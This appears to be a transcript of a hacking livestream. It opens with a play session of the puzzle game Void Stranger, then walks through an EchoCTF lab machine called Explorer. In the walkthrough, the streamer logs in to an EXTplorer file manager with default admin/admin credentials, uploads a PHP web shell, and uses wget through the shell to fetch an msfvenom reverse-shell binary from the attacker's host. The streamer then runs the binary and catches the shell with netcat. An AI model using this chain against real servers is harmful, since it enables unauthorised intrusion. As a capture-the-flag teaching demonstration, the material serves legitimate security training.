We're in.
Shall we play a game?
How about global thermonuclear war?
Hey there, HackerFrogs. It's me, the Shy Hat, and we're doing HackerFrogs after school today. We're doing HackerFrogs free hacking. We're hacking all the things. Let's see. We got some questions on Twitch right away. So let's see. Benin asks, "What does the amount of hacker bytes you have? Is there a limit, or is there just like an absurd set you have to have?" Well, I mean, you can use your hacker bytes to keep track of how long you've been following the stream. So people with more hacker bytes have been following the stream for longer than people with less. And eventually, I'm going to be setting up a shop where you can redeem your hacker bytes for fun little interactions with the stream. I'm not sure when exactly that's going to come into play, but yeah, that's what you can do with your points or your hacker bytes that you're collecting on the stream. So let's talk about what we're doing today. Stan C U Liao. I'm not too sure how to pronounce your name. Hello, nice to see you here. And yeah, let's talk about what we're doing on today's stream. So today is Monday. It is January 5th. And we're going to be doing 4 topics, as we like to do on the channel here. And the first topic, we're going to be doing some gaming. I'm enthusiastic about doing more of this game over here called Void Stranger. It's got a very retro aesthetic, and apparently it's supposed to be very, very difficult with a lot of secrets and stuff. So I'm happy to be able to dive into that, and that's the first thing we're going to be doing in the stream. The second thing we're going to be doing is we're going to be doing a demonstration for EchoCTF. So EchoCTF is a CTF platform where you can hack against machines on the network, and we're going to be doing the Explorer machine over there. It's going to be some file upload attacks as well as some privilege escalation, and hopefully we can learn some new stuff. Cyber Dante, hello, nice to see you here. It's a Tuesday here. Mava do in God, I believe. Hello, nice to see you here, Mava, and it's Tuesday here. Okay, so I mean, you must be in Europe or in Asia. Where are you from? I'm in Canada. I'm in Canada on the West Coast. So here it's still Monday. But yeah, thank you very much, Cybernerd Dante, for highlighting your message. Thank you. Okay, let's talk about what else we're doing. So the third topic we're going to be doing today is we're going to be taking a look at some industrial control system hacking. And we're going to be exploring that over at TryHackMe. They've got a module called Attacking ICS Plant number 1. There are 2 of those, and we're going to be covering them both. But we're going to be covering that, yeah, we're going to be seeing how that's different from hacking other network services over at TryHackMe in the 3rd hour. And in the 4th and 5th hours, we're going to be going back to Advent of Cyber side quest over at TryHackMe. We're going to be doing some more advanced attacks, maybe. I'm not too sure. We're just going to be winging it over there. And thank you very much for following Sys Element over on Twitch. Thank you. Okay, so just a second. I just need to do a little of a cough. And yeah, so we're going to start with some gaming. Let me go ahead and put, we'll do like 70 minutes because I heard that the game that we're playing, Void Stranger, is kind of a long game, like 50 hours to complete everything. And I need to schedule out a lot more time over the next few weeks to play that game. Anyways, so I'm going to start it out. I've been having some trouble with the audio, but let me know if you can hear the audio. Let me go ahead and turn on the game audio. Okay. So you should be able to hear some background music. I can't hear the background music, so I need to... Can somebody confirm that you can hear the music in the background? No? Okay, so you can't hear anything, but apparently there is supposed to be music coming out. No. Okay, okay. All right, let me turn on the game. Then it says, when you said attacking ICS Plant, I immediately thought of your avatar just body slamming a tulip. Why? A plant. Oh, okay, okay, okay. Yeah, I get it, I get it. Okay, so you can't hear anything. Let me pull up the game. So, over here, I've got the games hooked up. Oh, it's not hooked up. All right, let me let me add the source then. Just a second. Where is the darn thing? Add source. We're gonna add a. There should be something for the game capture. There you go. Okay, and you should be able to see the game now, and it's covering the entire screen. I need to go and adjust that. Okay, let's go. Oh, we've already got a game capture. Okay, we'll make this not visible. We'll make this visible. All right, you should be able to see the game. Let me see if the music comes on after I start playing the game. All right, so we'll go into the game, and so we can. Oh, I can hear the sound effects. Can you hear the sound effects? You can hear the sound effects. Okay. All right. Let's continue then. So, okay, let me remember what we need to do here. So we need to use the A button to pick up the tiles, and then we need to put them down somewhere. So we can put them down here. We can grab the tiles and put them down here. And we could maybe make a bridge over here. I'm not too sure why we'd want to do that. I heard there were like hidden areas in this game. Yeah, so are you using a controller or a keyboard? We're currently using a controller. Okay, so we just grab this and then we can get to the exit. So let's just exit then. Okay, now you should be able to hear the music. Please let me know if you can hear the music. I think I've seen these glass tiles before when somebody else is playing, and they break after you move over them. Yeah, just like that. So we'll just put a tile here, and we'll just... I think we can stand on the tile and then open up the chest. Each one of these chests has a little bug, and each one of these bugs is going to give you an extra life, so that you can, so that when you die, you don't have to start all over again, I suppose. Okay, let's put these tiles down, and we'll grab one so that we can go over here, and then we can exit. So what's going on here? It looks like we've got an extra... Okay, so I'm just gonna grab one of these. I think we can pass over the glass here. And then go down, get the bug, go over here, put down a tile, and then pick up this thing. I don't know what this crystal thing does yet. And then we can exit. Okay, so up down, over, pick up this thing, and then... So here's the thing, if we go over and grab the treasure chest, can we actually get back to the other side? I don't know if we can. Okay, I'm gonna avoid this treasure chest. So I'm just gonna go for the exit. And I see some more boulders. So I can grab one of these, go and get the treasure chest, then go down, put down a platform, now, what do we do from here? So I push... Oh, you can pick these up. Okay, so... I didn't know that you could pick up these glass tiles, so... How does that change things? Pick up the glass tile, put it down. Move onto the glass tile. Maybe move around in a circle? Because I don't see how we get back to the stairs now. So I step on the glass. Oh no, I think I see. Oh wait, I don't see. Step on here. Step over here. Grab the glass tile, but we can't move. We have to throw ourselves in a pit. So the only thing we can do is we can move back over here. I don't see the solution for this. Yeah, so if we... It looks like, I think this is game over. So just, is there a reset button? So here's the funny thing about this menu over here. I haven't really explored it. Memories. I don't even know what this does. So we've got some... Oh, we've got... Oh, okay. So the crystals I've been collecting, they're like a currency for unlocking these cards, maybe? So if we unlock this, this is like a memory. Okay, so it's like, I think this might be like the princess character that we saw in the flashback. So we're playing as the nanny character or something, or like a maid. I'm not too sure who we are. So it's just like a picture. And this one costs 4 crystals. This one costs 6. Let's do the one that costs 4. Okay, so this is just... You don't have to play Game Boy in 2026 anymore. It could at least use Game Boy Color. This was not my... This is not my choice, but that's the aesthetic of this game. So this game was made by like a Finnish developer. I've heard things about Finnish game developers, and they tend to be kind of wacky. Okay, so let's go back. So I think it's time to commit suicide. Not just kidding. We don't commit suicide, but we're gonna have to game over here. So we're gonna have to drop in a pit. Okay. So we get to try again. So how do we get to the other side? We've got 7 attempts left. Maybe if we... So I'll pick this up. And then I'll open this up. Oh, it's no longer... Yeah, okay, so it doesn't have the extra life in there anymore. This game has got pretty strict rules. Actually, wait. We can put this here. We can grab another one of these. Step on here. Step on here. Put this down. Then this needs to break. Oh, you know what? I think I know what we need to do. Actually... Okay, I need to suicide. I need to game over again. I can't say... Okay. So we'll just replace these. Can we? So I'll replace... So I'll just grab one of these tiles here. And I can put this here. And grab this. Okay, we'll put this here, and then we can put this here. We can go here, we can break it, and then we can put another one of these here. And they'll put these here, and I'll step on this glass here, I'll get rid of it, I'll replace it with like something that doesn't break. And we can put this one here. Okay, so I think we've solved this. So we can get... Oh! We can get to the next level. Good, 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 good. Alright, so what's going on now? So I'm still not completely sure about these ball monsters. I don't know what they do. Move down. Move down. Oh. So that ball... Oh, so I think the ball monsters come... They try to approach you when you get too close. So step off of here. And then... This tile here, we're gonna put... So we want to get the chest, but I don't know how we can get the chest. I can pick up one of these. And then we can... The only thing I can think to do is to just run past here. Yeah, that's all I can think to do. Anyways, let's move to the exit. So these are snakes. So the snakes, they'll move around, and if they touch you, then it's game over. I think the snakes also break the glass, but I'm not sure. I'm gonna have to observe. Okay. So the snakes do break the glass. Okay, and then I think we can make a break for it. Up, and then over, down. then wait for the snake to leave. We can pick up this tile, we can put it here, we can get the extra life. Then we can put this back here, and then we can make a break for it. Run, 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 run. But what about this snake? So can we isolate the snake? So we can isolate the snake like this. We can step on here. We can break this. We can put another tile down here. Okay, I think we're okay now. So we just need to grab these tiles and put them down, and then we can get to the exit. Great. And what about this screen? So it looks like we definitely need to move to the left. So let me grab one of these, put this down. Oh no, I trapped myself. Okay, I need to game over. Okay. So we'll grab this, we'll put this here. Then we'll move across. Sick in the mind, hello, nice to see you here. Okay, and grab this tile. Put it here. We'll just grab the glass tile here so that we can uh-oh. Don't want to do that. Okay, then we run for it. Break all the glass. Then up, over, put down our tile, and then we can leave. Okay, good. They've got a glowing statue over there on the left. Let me grab some of these. We can't grab anything from here. Okay, so over. We'll grab this. So we need to avoid this worm thing. We also need to build out a path to get to the stairs. So first of all, maybe we can just... put this here. Grab one of the glass tiles. I don't know if these glass tiles actually help us or not, so we can... sneak past here. I'll put this down. So what I want to do is I want to trap this worm thing, because it's gonna... So we'll just grab this. I think we can break this, put this down, and then grab these regular tiles. Okay, and I think this still doesn't solve our problem. Hacker1 says, why is everybody busy creating their own course in cybersecurity? That's a good question. So, okay, so HackerOne, you're talking about people building their own course in cybersecurity. Can you name some people who have recently built courses in cybersecurity? Signamind says, I'm 99% certain my AllCyber account was banned. Was banned because, which checks out because I think it's intended for Italian students only. Are they checking where the IPs are coming from and then banning the accounts? I'm not too sure if my AllCyber account still works right now or not. Maybe I can confirm whether or not mine is still okay. So I don't think we can solve this puzzle. We can't put any tiles down towards the stairs. Okay, so Signamind says, I did a couple of 2025 winter flags and then my account creds were locked out and the password reset never sends. I'll check that out after this segment is over. Thanks. Okay, we got ads running on Twitch right now. So usually we take a little break, but I'm kind of stuck on this puzzle. So how would we do this? I think the only way we could possibly do this is to build up into the corner and then go down. So we can put down... Alright, so I'll put this down. Then we need to trap this worm guy. But I don't think... Okay, let me grab this. Approach here, wait until he goes down, he goes up, then move over here. I think I need to game over once. Okay? So we start off here. So maybe instead of moving around, I'll just go directly in this direction here. So how many... Then over. Over. grab this, put this here. Okay, Too Fat Show, hello, nice to see you here. What is up, what is up? So I think we can we strand this worm? So we strand the worm like this. Then we can move over. Like this. Put these down. So is this enough? Okay, we can solve it. Great. Okay, we managed to do it. All right, next level. So level. There's got to be some trick to this. So I'm gonna go and get the chest first because the chest has an extra life. Up, up, up. Get the extra life. I think we have to avoid this monster guy. So is there something special about this monster guy? So he'll come in. He'll come towards me. So it's tracking the movement. It's moving in my direction. But anyways, well, we know this. Okay, we can move to the next level. All right, so we got more of these monster guys. Can we get rid of them somehow? Or maybe... we can lure them around, okay. We go faster than them. Okay, and they fall into pits. So we can just go across and then get the extra life, and then we can move on to the next level. So... I think to get rid of this guy, we'll just create a hole. Uh-oh. We'll just lure them over. Okay. And then we can go to the exit. I think what we need to do first is we need to get rid of this, this mouth monster guy. Down. We'll just run over to the other side to get the extra life. Okay, and now that we have it, are we stuck? I think we might be stuck. Well... looks like we need to game over. Well, game over. Move down. Make a hole for this guy to fall into. Then move down. Put the tile back. Go down. I think we can just make for the exit right now. Okay. Alright, next one. Next one. So what's the trick here? I'm pretty sure we can use boulders to squish the monsters. So I'm gonna push the boulder push the... Oh, but when you push the boulder, it destroys the glass bridge. So we can't really push it across the bridge. Alright. I think if we just want to get to the exit, we can do it like this. So just grab one of these, then cross the glass bridge, push the boulder out of the way, then put down... Oh no. I can't push the boulder off. I think I need to... I think I've lost. Pick this up. Yeah, but I can't... I need to... Game over. Okay, so how are we gonna do this? I guess I could start making a bridge down towards the bottom here. Like this. And I can lure the monster into the pit. Okay, so after we've done that, we can go back up here. And we can just run for it. Get to the exit. Alright, so looks like there's a special tile over here in the corner. I think I'm gonna lose a life. Yeah. So the monster bit me. Alright, so we just need to go around the monster then. Okay, well, we need to lose another life. So how do we juke around this monster? Move here, move here. Move down. Move down again. Okay, so the monster's gone now. And then we can go to the exit. Okay, and now... I think all we need to do is... grab one of these tiles, and then build a bridge here. Okay, and now... it's pretty easy to lure the monster into the pit. Okay, grab one of these, put this down, and then we can exit. Okay. Langston's entropy says, the monster comes your way if you are vertically or horizontally within its origin. Vertically or horizontally within its origin. I think so. I guess it needs to lure it away from the clear path. I mean, I guess we get to do a little bit of more experimentation. We're gonna see this monster more and more. Okay, exit. So what do we want to do? There are two objectives. The first objective is to get the extra life. The second objective is to get the special tile that's underneath the boulder on the left. And the third objective is to get the exit. I mean, I can grab one of these, and then get what's in the chest. Then move the boulder. So the second objective is to... Oh, I don't think there's a crystal. It's just some boulders underneath. Just destructible terrain. So we can move this boulder over here. And actually, it's pretty easy. All you need to do is, yeah. So you just go to the exit. What's the name of the game? It looks very fun. This is Void Stranger. So the name of the game is up at the top left of the overlay, just beside current topic. Let's exit. Okay, so we got the monsters here. And we just need to figure out how to not get eaten by the monsters. So we'll pick this up, and then we'll... So if we start just playing around with this, so this monster's not moving. Okay, great. And we'll lure the other monster into a hole as well. Uh-oh. Okay, good. The music is very good. Yeah, I like it a lot. Okay, we'll put this down and then we can go to the exit. Man, how many levels are there? So, okay, what we want to do is we want to get the extra life, and then we want to get the crystal thing that's buried by the stairs. We'll just start replacing these. Okay, we can build out here. Get the extra life. Get the... How do we get access to this crystal? I don't see a way to access it because the moment we touch the stairs, we exit the level. Oh, I can put the stairs away. I can put the stairs somewhere else. That's pretty cool. Okay. So we can grab this, put this here, grab the crystal, great. And then we can rebuild this. This is something I forget. I did know that you could grab the stairs, but you don't use it very often. Okay. So what's next? So this is level 51. We need to build a bridge and get access to the stairs. We can grab some of these. Then we can start building over. So this lets me grab this. Put these here. But how do we make the bridge? Oh, okay. We can make the... I see how we can make the bridge. So we go down here, and then up, and then build like that. Then we can build this one, and one more. Okay, cool. We can exit. 52. We need to get to the exit. There's a monster in the way. So we need access to these building materials. Okay, grab this. Go down, put this here. Uh-oh. Go here, push the boulder. I think I need to sacrifice a life here, because I can't... I don't have any building materials. I'm stuck. Alright. So we need to make sure... The other way we could do this is we could start building down, but I don't think that really works in this case either. Grab this. Cross the bridge. Replace. Cross the bridge, replace. Oh. Maybe we move down and then to the left. And then put down a... Does that work? So like this. Okay, okay. Then put this down here, then put this down here. So the only thing in the way is the monster over there. How do I trick it into leaping into a pit? Put this down. Can we squish it? I think we can squish it by pushing a boulder into it. Yeah. Oh, okay, okay. That works. And then we can exit. Do we just move to the exit? Okay. So grab this, then push the boulder. Oh no! I can't exit anymore. Because I can't pick up the exit, and the boulder is blocking, so I need to lose a life. Okay, now so we need to move the boulder to the side first. Move it to the side, put down the tile, then we can exit. Okay, good, good. There's another person. Also see like some different tiles. So what does this tile do? We can pick it up. Is that? So the icon above the wand that I use, it seems to be indicating that I'm holding the stairs. What happens if we push this boulder over here? Oh, that opens up the stairs. And I guess when it's not on the button, it's not the stairs. We can move the boulder. We can move the boulder. Then we can move this boulder up and out of the way. And then we can talk to this person. What the? Who the hell are you? And why are you giving away my hiding place? Now those monsters will surely find us. Are you completely daft? Oh no! Oh no, no, no. So can we push this person? Oh, okay, we can push the person. So I think what we need to do is we need to pick up the stairs and put it somewhere that we can access it even if we push the boulders onto the button, and then we can exit. Can we push the person into the exit? Maybe? Let me try. Okay, that doesn't do anything. But I guess we can exit. Okay, and we got one of these trees. So the last time we used the tree, we got to see more of the story, but it also shut down the game. Let's see what happens this time. A lone birch tree stands in the void. This area feels safe. And since you've been traveling for quite some time already, would you like to rest for now? Do they give you an option? Yes, no? I guess we'll rest, and we'll see what happens in the story. Slowly, surely, dreams embrace you. Okay, and it shuts down the game, and then let me start up the game again. Okay, do you see the game? This is preposterous. Please, Your Majesty, I implore you to calm down. Calm down. That wretched daughter of mine is steering this kingdom towards ruin. And you implore me to calm down? Little good will result from impatience, Your Majesty. I've been patient with her. More than you can imagine. But this has gone on far, far too long. Rumors have started to spread. How one lowly king can't even get his daughter in order, let alone his dwindling kingdom. And have you heard the nickname they've given her? I'm well aware of the rumors, Your Majesty. Then go find her and speak some sense into her right now. Tell her she will stay behind these walls until she obeys. Your Majesty, Need I remind you of your place, Lady Grey? Another day, another groom candidate off the list. What number are we at again? I've lost count. At the very least, you didn't break any bones this time. Your Highness, we all know you're not fond of the situation at hand. But if you don't give them even the slightest of chances, things will simply get worse from here. From here on. You're just parroting what my father told you to say. I only wish the best for you, Your Highness. Really? Then why don't you tell that old man to shove it? Your Highness, I don't give a single ounce of ass about this country, or the king, or being a princess for that matter. At this point, it really would be easier to just run away. We should have done that years ago. There's still time, right? If you actually care, then help me. What you ask of me, I simply cannot do. Oh yes, I forgot. You're just the king's laptop these days. I'm sorry. I went too far there. As the lady-in-waiting, my allegiance lies with this kingdom and its ruler. But as your friend, I'm always on your side. No might in this world will change that. Well, at the very least, it would take more than a petty tantrum. I'll let you have a moment now. Try to get some rest tonight, Your Highness. Okay, I guess we wake up. Just a second. Just need to move my windows around a bit. I guess we keep on going. Okay. Okay, we can actually access one of these doors. What does it do? So we've got an ad running on Twitch right now, so I'm just going to take this opportunity to have a little water break while the ads run. So just a second, I'm just going to have a little bit of water, just a second. And let's see. So what's going on here? Okay, we can read this thing. The mural is filled with inscriptions. Deciphering them seems like a futile effort. So we just don't get to do this? Maybe we get to come back later. Alright. Guess can pick these up. I heard that there might be like hidden tiles or exits. What the heck is this? Is this a boss fight? It sounds like boss fight music. This thing's weird. Hold on. Why is this intense music playing right now? Anyways, I guess we can't do anything here. So if we can't do anything, we might as well get to the exit. Why is the music still really intense? There's an empty treasure chest? There's an empty treasure chest. There's also the exit, like, right to my right. Uh-oh. This monkey's coming for me. Can it jump? It can't jump. So... I think I should just exit. Because I don't think I can get to that crystal in the corner. And I don't want to use up lives unnecessarily. Okay, we just exit. More of these monkeys. I mean, I don't know if they're monkeys or not. I don't know what they are. So do I just run for the exit? So this might be a good opportunity to figure out what exactly the monkeys are actually doing here. So does it follow me? Oh, it goes in a... So I'm probably going to encounter these monkeys later. So if we just put this down, it starts following me. No, it's moving in a... Is it moving in a straight line? It's moving in a straight line until it hits a wall. So if I come across, it will move in a straight line until it hits the wall, which means I can get the treasure chest here. I can grab the crystal. I don't think I can grab the crystal. So I'm just gonna move around. Uh-oh. I think I'm losing a life here. Yeah. Okay, I'm just gonna get to the exit then. Okay, exit. Alright, so we need to push the button in order to activate the exit. There's also this treasure chest, but there's nothing in it. Yeah, why do they have the empty treasure chest here? So press the button and the stairs appear. So I guess what we need to do is we need to get the monkey to press the button. How do we do that? There's no place to put anything down. It's empty, sure. This is empty. Can you move the button? There's no space for me to put the button. We can move the button. I mean, I can pick up the button, but I can't... I can't put it down anywhere because you need an empty space to put it down. The that upper left corner of the monkey's line. So upper left corner. Yeah. So we lure the monkey out, and then the monkey falls in. No, the monkey doesn't fall in. We can put the button... Oh, we could lure the monkey over to hit the button, right. Let's do that. But I don't think it's possible anymore. Oh! This creates an empty hole. Hold on. So we can lure the monkey out. Grab the button. We can't grab the button? Oh, okay, okay. Because I've got something in my hand. Yeah, I don't think we can finish this anymore. I need to lose a life. So let me lose a life. And then we just need to lure the monkey out and then get to the exit. Lure the monkey out, go to the exit, the monkey will step on the button. Okay. So same thing, we need to lure the monkey into stepping on the button. But how do we do that? There's no place to put any of these. We can't swap this out. We need the monkey to stop like on this line over here in order to hit the button. So we can lure it down and then up. We can pick up the stairs. We can pick up the button. But we can't put the button down anywhere else. There's got to be some like special quality that I'm not understanding here. So lure the monkey out. Oh, we can remove tiles. So if I remove a tile like okay, I think I know what we need to do. We need to remove this tile. So if we remove this tile, then the monkey will stop in front of the empty pit. Okay. We'll put this back, and then we can. Remove the tile to the left of the bottom right chest. To the left of the bottom right chest. Here? Oh, yeah, maybe. So we can lure the monkey into stepping on the thing here. can remove... Uh-oh, I think I've doomed myself. How do we get the monkey to stop directly on the button? Can you want remove the one towards the center or on the sides? I think we can. Let me figure out what the best way to do this is. So maybe... Yeah, the treasure chests in the way get... they're a bit of a hindrance. Here. Man, I feel like I'm really close. Oh, okay. Just like this. So now it'll stay here, and I can exit. Ah, man. Alright. And I think I don't. We might be able to solve one more before we need to move on to the next thing. So the monkey will. That's the tile I was talking about. Okay, okay. Yeah, I guess picking up the button was kind of a cool thing to do in that case. All right, so we can grab one of these. Oh, we can just lure the monkey down here. And then pick up these tiles and then exit. Now there are many monkeys. I think we might have to leave it off here, because we run out of time. Anyways, we'll exit from the game. Thank you very much for sticking around the game section of the stream. We'll just close out the game and we'll move on to the next part of the stream. Let's turn off the game capture. Is there another game capture that I'm missing here? There is. Okay, let's get rid of that. Okay, right. We can move on to the next part of the stream now, and let's put on a little bit of music, because I can. But thanks to everybody who has given good advice. I very much appreciate it. Puzzle games are tough. And let's play some of this music over here. Okay, so topic 1 is done. We'll just cross that off. We're doing topic 2 now. And topic 3 is on deck. Alright, so we're just going to do a demonstration of solving a Linux machine over at EchoCTF. So Sick in the Mind says that his account got banned on Cyber. I'm just going to check out and see if I still have access to my account. So training.allcyber.it. And it looks like I'm still logged in. I'm not too sure why they might have banned your account. Sick in the Mind. But anyways, let's go ahead and set up the next part. So if you're interested in buying this game, Void Stranger, it's not super expensive. It's like 15 bucks. Canadian, it's probably much less if you buy it in American dollars. But here's the link. Okay, I think they can also make the music a little bit softer. Okay, let's set up my walkthrough for EchoCTF. So EchoCTF, BR-CTF Network. This is Explorer. Okay, so EchoCTF is it's a great free, well, there is some stuff that you can pay for on EchoCTF, but it's mostly free. And if you want to check it out yourself, you can make an account over at this website right here. We're going to be doing an exercise from the BR-CTF network, which I was working through with OreoByte. I haven't seen OreoByte in a while. I should probably check in with them. But yeah, let me go ahead and do the YouTube intro so that we can get started with this exercise. All right, everybody, this is a guided walkthrough for the Explorer machine over at EchoCTF.red as part of their BR-CTF machines network. So the first thing we want to do for each one of these exercises is we want to start up the machine. So we can click on this gear button over here, and then we can click on power up the target. So that's going to activate the machine so that we can access it. These machines have a common IP address on the network, which means that we don't have to constantly fiddle around with these IP addresses. So we'll reload the page, and we see we've got this IP address right here. So we're just going to copy the IP address, and then we can start our scans. So typically what you want to do for these kind of exercises is you want to do a little Nmap scan. So you can run Nmap against this IP address. You can run it against all the ports. You can run it very verbose. You can run it T4, which is fast but not too fast. And you can get the versioning information for whatever you find as well. So when you run the scan, I didn't expect so many ports to be open. Am I actually dealing with the machine I'm supposed to be dealing with? So 10, 0, 160, 156. These ports are not supposed to be open. But let me check my notes. Yeah, according to my notes, only port 80 is supposed to be open, so I'm not too sure why we've got all this stuff. We can also check out port 80. Port 80 is accessible from the web browser. Let me make a new tab. So HTTP, and then paste in the IP address. Oh, I don't think I might not be connected to the network. Okay, let me go ahead and go check out my platform access. I'm not actually connected here. Okay, so I forgot to start up my EchoCTF VPN connection. Let me do that right now. Silly me. Should be in my downloads directory. Okay, let's do that. All right, so I should be connected now. Why? Anyways, we'll go back. What you want to do is you want to do a little Nmap scan, and when we run the Nmap scan, we're going to see only one port open. So the port is port 80 over here. And yeah, let's go ahead and investigate this. So when you're doing a network CTF challenge against port 80, we want to do some web enumeration. So there's lots of different web enumeration tools we can use. So one of the simplest we can use is the derb tool. So the derb tool is going to take a common directory list and then try to find common endpoints on that list. So we can run it. It's going to go around for a while, but in the meantime, what we can do is we can check out the web page ourselves. So we'll just reload this page. HTTP, and we see this suspicious looking sheep. So what is the suspicious sheep? Okay, so it's an old guy with good skill. Sick of the Mind says, what's this one called? This one is the Explorer machine. So let me get the link. Saharan, hello, nice to see you here. Doctor, I'm not a doctor. Okay, so I guess what else we should do is we should probably read the description for the machine as well, because the description can sometimes have some hints as how to solve the exercise. So it says here, the prominent individual, delve into the world of a remarkable and influential figure. This captivating exploration offers an intimate look at the life, achievements, and impact of an exceptional individual, providing valuable insights and inspiration. So, the person they're referring to, I think, is Databus, and Databus is the platform creator of EchoCTF. So I guess there's some self-aggrandizing right there. So the other thing we need to understand is we can go back to the web enumeration and the derb scan. So the derb scan is going to very slowly scan against all these endpoints over here, and if there are any endpoints that it finds, then it will report back to us. So the thing is that there is a particular endpoint that we're looking for. I don't know if I want to wait for this to go through because it seems to be taking its sweet time. So what we're going to do is we're just going to what is the word? Skip ahead. We're going to skip ahead to the next part of the enumeration. So as part of the derb scan, it'll discover the Explorer endpoint. So we just go to Explorer in here, and we see that this is an endpoint that uses this application right here. It's called EXTplorer. So EXTplorer, well, right away we don't know what this is, but we could probably do a little bit of research. So just on the web, EXTplorer. This is a PHP-based file manager. So if we just click into here, it'll tell us all about the software. I'm not sure if this is, yeah, okay, I think this is it. So EXTplorer is a PHP-based file manager. The other thing that we could do is we could go into the application and try to use some default credentials. So the CTF network teaches a lot about basic web app hacking techniques, and one of the most common ones is to look for default credentials. So in this case, the username would be admin and the password would be admin. And if we're able to access the application in this way, that's a really, really bad thing from a security point of view. So click on login, and we get access to the application. That's great. Well, not great for security, but yeah, we've got a file management system. So if you know anything about file management systems on the web, they can be used for a lot of, well, they make it very easy for us to do some malicious attacks. Because the thing is that these file management systems, they let you download and upload files, and most of the time, the types of files that you can download and upload are not restricted. So let's talk a little bit more about that. So in this challenge, we discover a file manager app using default credentials. So file manager apps provide a convenient means of performing file upload attacks. since the type of files allowed to be uploaded are typically unrestricted. So Saharan says, like the cPanel. cPanel, is that, I'm not too familiar with that, or maybe I am. Can you elaborate? So on this system, oh, okay. So this is what we're going to do. We're going to upload a malicious file to the application, and then we're going to use it for malicious purposes. So what we're going to do, because the system uses PHP, how do we know that it uses PHP? If we go over to the application over here, well, we actually know it uses PHP because this was described as like a PHP-based file manager. So the type of malicious file that we're going to upload is a malicious PHP file. I'm just going to grab a very small PHP reverse shell payload over at revshells.com. So let's see, PHP small, and we're just going to make a very small web shell file. Let's see. So we found the Explorer endpoint using the derb tool over here, and this is how we would naturally discover the Explorer endpoint. So let's go ahead and create this file. Saharan says it's a web app file manager. I was using it on Namecheap hosting. Oh, Namecheap hosting has like a native application that they use for file management. It's called the cPanel. I didn't know about that. Okay, so we're just going to create this file in here, and we're just going to name it shell.php. I guess we could, to be more explicit, we can call this webshell.php. Because this is a web shell, it's going to get us access to the web server and let us run system commands. So the next thing we need to do is we need to upload this file to the application. So since we've got access to the file manager here, we can just click on upload, and we can select that file from our system here. I think it's in the temp hf webshell.php. So select that, open it, and then click on save. And we see that the file has ended up in the root directory here, in the web root, as webshell.php. So we can directly access this. Go to webshell.php, and we don't see anything. So we don't see anything because we didn't actually give a command. What we would do in this case, let's talk about this. So what we're doing here is we're using a PHP web shell. The web shell is going to retrieve a URL parameter, and in this case it's called 0. And whatever we put after the 0 is going to be executed as a system command. So we could give something like 0 equals whoami, and it'll run the whoami command on the web server. Or we could give 0 equals lsla to get the directory contents, etc., etc. And the way we're going to do this is we're just going to go back to the webshell.php file. We're going to access the 0 URL parameter, type in whoami, and this is going to get us the name of the user that we're running as. So we're running as the ETSCTF user, and the next thing we want to do is we want to get a more stable foothold on the system. I mean, web shells are great. You can run any number of commands from a web shell, and most of the time you don't need direct access to the machine, but there's some things you can only do if you have direct access to the machine. So what we're going to do is we're going to create a binary that gives us a reverse shell. So the binary that gives us the reverse shell, we can create it with MSF Venom. This is going to create an ELF binary, or a Linux binary, called rev.elf. And what it's going to do, it's going to make a call out to our IP address on the network on this port right over here. So we can, when we give this command, we need to give the IP address that we're using for our attacker machine as well as the port number. Run the command, and then we will have our reverse shell binary. Okay, we've got webshell.php over here. No, oh, sorry. We've got rev.elf over here. We want to upload this to the target. And in order to upload this to the target, we need to host it on our attacker machine. We can host it on our attacker machine using the Python module. So it's python-m http.server80. So this is going to create a temporary HTTP server on our attacker machine that we can access with the victim machine and download our reverse.elf file over here. So when we run this, we create a temporary HTTP server from the current directory. So the web root in this case is going to be on our attacker machine in temp/hf. So the other thing we need to do is we need to use the web shell to download the rev.elf file. So it's going to be this IP address right here, which is our attacker machine. We're going to run a wget command from the web shell. So download from the attacker machine rev.elf. We're not going to run it from our attacker machine. We're going to run it from the web shell. Copy the command, go back to the web shell, paste in the command in the browser, and it looks like, I think we've downloaded it. So to make sure whether or not it downloaded or not, I'm just going to go over to, it looks like it didn't download. I wonder why it didn't download. Hold on. Let's go back to the... So webshell.php 0 equals wget, and it didn't go through. Let's run... Did the machine go down? Let me check back at the machine over here. I don't think... Okay, so the machine's still running right now, so it should be running for the next 45 minutes. It's a really slow box. Yeah, apparently. So let's just go back to... Let's try webshell.php again. If it's a shared instance, someone's probably hammering it. Am I hammering it right now? I don't... Oh, yeah, I am hammering it a little bit. Okay, so we've got the server running on port 80 on our Kali machine. Let me just make sure that this web shell is still here. I think we might need to we might need to reset the box. Okay, so this is, we can access this, we can access the Explorer endpoint. Oh, it doesn't want, the Explorer endpoint is a bit, yeah, the box isn't very responsive. I might want to reset this box. Yeah, I'm going to do that right now. Okay, so go over here, restart target. Okay, restart request completed, and I'm going to have to re-upload my my reverse shell. Unable to connect. Okay, so we go admin again, log in, and then I'm going to have to re-upload my web shell. Not too big of a deal. Okay, and then access webshell.php again. ETSCTF, that is what we want, and then we can try to upload the reverse shell binary to the target again. Let's do that. Okay, so that seems to have gone through, and if we take a look at our HTTP server, the rev.elf file was downloaded. So from here, we can confirm this just with the little ls command. So ls, we've got rev.elf here, and we just need to make it executable and then execute it. So we do chmod 777 on rev.elf. And then before we run it, what we need to do is we need to create a netcat listener so that we can receive the reverse shell. So we're just going to run some rl wrap along with some netcat on port 443, which is the port that we specified. And this is going to be able to catch an incoming shell. So the next thing we're going to do is we're going to run the rev.elf binary, and it'll create a reverse shell connection back to our attacker machine. When we run that, we see that the web browser page is not resolving. It's just in the middle of execution. And if we go over to our reverse shell, we see that we've received a connection from the vulnerable IP address. So if you ask who am I, then it says we are the ETSCTF user. So I guess from here, what we can do is we can call in Mr. Scary Hacker Voice Man to talk about how we got in. So let me go and call him up.
Hey there, everybody. It's me, Scary Hacker Voice Man. Scary Hacker Voice Man comes out every time we break into a server, and we just broke into this one. Well, Mr. Explorer Administrator, it seems like you have configured your EXTplorer application file manager with default credentials. That is a big mistake. We're able to log in as the administrator to the file manager application and then upload malicious files, which we use to get reverse shell access. Maybe you knew about the security misconfigurations, or maybe decided to accept the risk. Well, you accepted the risk. And now we're in.
